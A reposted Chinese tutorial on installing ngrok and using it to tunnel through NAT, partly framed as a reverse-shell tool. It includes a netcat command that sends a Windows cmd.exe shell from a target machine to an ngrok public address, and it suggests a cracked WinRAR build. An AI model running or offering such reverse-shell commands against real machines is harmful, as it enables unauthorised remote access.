安云网 - AnYun.ORG | 专注于网络信息收集、网络数据分享、网络安全研究、网络各种猎奇八卦。
当前位置: 安云网 > 技术关注 > 神兵利刃 > ngrok一款内网穿透+记录HTTP请求的神器(支持HTTPS

ngrok一款内网穿透+记录HTTP请求的神器(支持HTTPS

时间:2016-08-28来源: 作者:2429946577点击:
双方都是内网的反弹shell工具。Ngrok的下载地址:https://ngrok.com/download如果你是MAC OS X或者linux可以按照以下步骤安装。$ unzip /path/to/ngrok.zip然后查看他支持的命令$ ./ngrokhelp如果你是 win…

双方都是内网的反弹shell工具。

//copyright AnYun.ORG

Ngrok的下载地址:https://ngrok.com/download

//copyright AnYun.ORG

1.jpg

//安云网,anyun.org

如果你是MAC OS X或者linux可以按照以下步骤安装。

//内容来自安云网

$ unzip /path/to/ngrok.zip 
//本文来自安云网

10.jpg

//ANYUN.ORG

然后查看他支持的命令 //copyright AnYun.ORG

$ ./ngrokhelp 

//安云网咨询系统

如果你是 windows下可以按照以下步骤安装

//安云网咨询系统

2.jpg

//内容来自安云网

下载下了后选中文件,右键解压到当前文件夹。

//内容来自AnYun.ORG

什么,你右键菜单没有这个选项。

//ANYUN.ORG

那么请安装《winrar烈火汉化破解版》。 //内容来自安云网

然后有个窗口一闪而过。 //安云网咨询系统

之后会出现这个:

//copyright AnYun.ORG

3.jpg //安云网,anyun.org

然后按下 微软徽标键+R (PS:微软徽标键就是 在你的键盘上Ctrl和Alt中间的那个键。) //内容来自AnYun.ORG

输入cmd然后回车。

//内容来自AnYun.ORG

4.jpg

//copyright AnYun.ORG

打开cmd后,将刚才解压出来的ngrok.exe拖入。

//内容来自AnYun.ORG

然后再输入help 回车。

//copyright AnYun.ORG

5.jpg

//内容来自安云网

可以看到它支持很多命令。 //内容来自安云网

NAME:
  ngrok - tunnel local ports to public URLs and inspect traffic

DESCRIPTION:
   ngrok exposes local networked services behinds NATs and firewalls to the
   public internet over a secure tunnel. Share local websites, build/test
   webhook consumers and self-host personal services.
   Detailed help for each command is available with 'ngrok help<command>'.
   Open http://localhost:4040 for ngrok's web interface to inspect traffic.

EXAMPLES:
   ngrok http 80                    #secure public URL for port 80 web server
   ngrok http -subdomain=baz 8080   #port 8080 available at baz.ngrok.io
   ngrok http foo.dev:80            #tunnel to host:port instead of localhost
   ngrok tcp 22                     #tunnel arbitrary TCP traffic to port 22
   ngrok tls -hostname=foo.com 443  #TLS traffic for foo.com to port 443
   ngrok start foo bar baz          #start tunnels from the configuration file

VERSION:
  2.1.3

AUTHOR:
 inconshreveable - <[email protected]>

COMMANDS:
  authtoken    save authtoken toconfiguration file
  credits      prints author andlicensing information
  http         start an HTTP tunnel
  start        start tunnels by namefrom the configuration file
  tcp          start a TCP tunnel
  tls          start a TLS tunnel
  update       update ngrok to thelatest version
  version      print the versionstring
  help         Shows a list ofcommands or help for one command
 //安云网咨询系统 

使用前先要去注册个账号, //内容来自AnYun.ORG

地址:https://dashboard.ngrok.com/user/login //copyright AnYun.ORG

不要告诉我你不会注册账号。

//安云网,anyun.org

6.jpg //ANYUN.ORG

先执行认证。

//安云网,anyun.org

Windows图: //ANYUN.ORG

9.jpg

//内容来自安云网

会提示你Authtoken saved toconfiguration file:认证文件存到哪里。

//安云网咨询系统

Linux图: //copyright AnYun.ORG

11.jpg //安云网咨询系统

(PS:Authtoken懒得打码了,请不要搞事)

//安云网,anyun.org

认证Token导入好后,开始讲内网穿透的部分。 //安云网咨询系统

./ngrok tcp 9999 **获得一个公网地址,如下图。 //ANYUN.ORG

12.jpg //内容来自AnYun.ORG

ngrok 是不能后台运行的,所以我们要借助screen(用法百度)实现后台运行。 //内容来自安云网

然后再nc -vv -l -p 9999
 
//ANYUN.ORG

然后目标机器(内网的windos笔记本)执行 //内容来自安云网

nc.exe -vv 0.tcp.ngrok.io 15996 -e c:\Windows\System32\cmd.exe
 

//安云网咨询系统

0. tcp.ngrok.io 15996 为刚才利用ngrok 得到的公网地址,如下图 //copyright AnYun.ORG

123.jpg

//copyright AnYun.ORG

然后就反弹回来shell。(PS:由于作者手中没有内网的服务器所以没截图) //ANYUN.ORG

下面讲内网机器做HTTP请求记录器: //内容来自AnYun.ORG

只需要执行ngrok.exe http 80就可以了。 //内容来自安云网

13.jpg

//安云网,anyun.org

会发现Tunnel Status online时

//内容来自AnYun.ORG

Forwarding                    http://771c988f.ngrok.io -> localhost:80
 
//内容来自安云网
Forwarding                    https://771c988f.ngrok.io -> localhost:80
 //内容来自AnYun.ORG 

访问后会有记录。 //安云网咨询系统

14.jpg

//内容来自安云网

http://localhost:4040是在线控制台,可以看请求的详细信息。 //本文来自安云网

15.jpg

//内容来自AnYun.ORG

如果你在80端口搭建了HTTP服务器,那么他就不是显示这个页面:

//内容来自安云网

16.jpg

//ANYUN.ORG

而是将流量转发到HTTP服务上,访问的是自己内网的HTTP页面。

//内容来自AnYun.ORG

参考: http://ttt.sssie.com/post-49.html(PS:由于有引导页,所以要访问两次。)

//ANYUN.ORG

*本文原创作者:2429946577,转载请注明FreeBuf

//copyright AnYun.ORG

顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
验证码: 点击我更换图片
相关内容
推荐内容